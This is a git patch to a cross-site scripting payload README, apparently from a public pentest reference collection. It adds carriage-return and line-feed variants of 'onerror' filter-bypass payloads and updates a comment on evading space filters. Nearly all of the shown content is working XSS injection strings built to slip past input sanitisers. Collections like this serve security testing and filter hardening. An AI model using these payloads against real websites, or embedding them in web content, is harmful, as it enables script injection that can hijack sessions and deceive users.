From ca3ab6eb95fd9d26535866186b010f0f97965575 Mon Sep 17 00:00:00 2001
From: isacaya <114328108+isacaya@users.noreply.github.com>
Date: Wed, 19 Jun 2024 04:21:24 +0900
Subject: [PATCH] Add a few XSS filter bypass cases

---
 XSS Injection/README.md | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index a5a487e..8ecd130 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -736,9 +736,11 @@ setTimeout`alert\u0028document.domain\u0029`;
 <object onafterscriptexecute=confirm(0)>
 <object onbeforescriptexecute=confirm(0)>
 
-// Bypass onxxx= filter with a null byte/vertical tab
+// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
 <img src='1' onerror\x00=alert(0) />
 <img src='1' onerror\x0b=alert(0) />
+<img src='1' onerror\x0d=alert(0) />
+<img src='1' onerror\x0a=alert(0) />
 
 // Bypass onxxx= filter with a '/'
 <img src='1' onerror/=alert(0) />
@@ -750,7 +752,7 @@ setTimeout`alert\u0028document.domain\u0029`;
 // Bypass space filter with "/"
 <img/src='1'/onerror=alert(0)>
 
-// Bypass space filter with 0x0c/^L
+// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
 <svgonload=alert(1)>
 
 $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd